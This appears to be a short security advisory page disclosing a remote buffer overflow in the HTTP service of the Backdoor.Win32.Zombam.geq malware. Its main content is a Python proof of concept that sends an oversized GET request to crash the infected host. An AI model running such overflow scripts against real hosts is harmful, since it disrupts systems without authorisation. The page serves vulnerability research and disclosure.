Backdoor.Win32.Zombam.geq Remote Buffer Overflow

Backdoor.Win32.Zombam.geq malware suffers from a remote buffer overflow vulnerability.

Exploit/PoC:

from socket import *

MALWARE_HOST="x.x.x.x"
PORT=80

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))
    PACKET="GET /"+"A"*2000+"HTTP/1.1\r\nHost: "+MALWARE_HOST+"\r\n\r\n"
    s.send(PACKET)
    s.close()
    print("Backdoor.Win32.Zombam.geq / Remote Buffer Overflow");
    print("MD5: fd14cc7f025f49a3e08b4169d44a774e");
    print("By Malvuln");


if __name__=="__main__":
    doit()

Exploit

Remote Buffer Overflow

Backdoor.Win32.Xel Remote Authentication Buffer Overflow Previous

Backdoor.Win32.Whirlpool.10 Remote Stack Buffer Overflow Next